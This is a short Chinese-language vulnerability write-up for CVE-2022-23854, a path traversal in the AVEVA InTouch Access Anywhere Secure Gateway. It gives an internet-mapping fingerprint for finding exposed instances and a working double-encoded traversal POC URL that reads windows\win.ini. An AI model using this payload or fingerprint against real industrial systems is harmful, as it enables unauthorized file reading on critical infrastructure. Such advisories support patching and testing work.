# AVEVA InTouch安全网关 AccessAnywhere 任意文件读取漏洞 CVE-2022-23854

## 漏洞描述

AVEVA InTouch Access Anywhere Secure Gateway 2020 R2及以前的版本存在路径遍历漏洞，未授权的攻击者可利用该漏洞获取服务器敏感信息。

## 漏洞影响

```
AVEVA InTouch安全网关
```

## 网络测绘

```
body="InTouch Access Anywhere"
```

## 漏洞复现

登录页面

![image-20221017170909794](images/202210171709863.png)

验证POC

```
/AccessAnywhere/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini 
```

![image-20221017170935596](images/202210171709651.png)